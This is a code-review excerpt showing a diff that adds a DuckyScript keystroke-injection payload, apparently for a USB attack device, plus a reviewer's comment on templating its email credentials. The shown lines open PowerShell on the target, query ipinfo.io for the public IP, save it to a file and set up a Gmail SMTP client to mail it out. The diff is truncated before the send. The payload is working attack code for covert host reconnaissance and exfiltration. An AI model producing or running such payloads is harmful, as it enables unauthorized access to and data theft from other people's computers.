payloads/library/credentials/PublicIPGrabber/duck_code.txt

```diff
@@ -0,0 +1,60 @@
+REM Title: Public IP Grabber
+REM Author: HeadScratchCode
+REM Version: 1
+REM Description: Grabs the Public IP address being used by a Windows system, writes the found IP into ip.txt, emails the contents of ip.txt 
+DELAY 3000
+REM --> minimize all open windows 
+WINDOWS d
+REM --> open POWERSHELL
+WINDOWS r
+DELAY 400
+STRING POWERSHELL
+ENTER
+DELAY 200
+REM --> Grab the public IP
+STRING Invoke-RestMethod ipinfo.io/ip > ip.txt
+ENTER
+DELAY 1000
+REM --> Sending email
+STRING powershell
+ENTER
+DELAY 500
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+DELAY 500
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+DELAY 500
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+DELAY 500
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('FROMEMAIL', 'FROMEMAILPASS')

```

Comment:
You can use variable assignments in bash to act similar to `DEFINE` in duckyscript, I would recommend this for any configurable options. 

```
FROMEMAIL="example"
FROMEMAILPASS="example"

STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('$FROMEMAIL', '$FROMEMAILPASS')
```

Please go through and do this where it applies.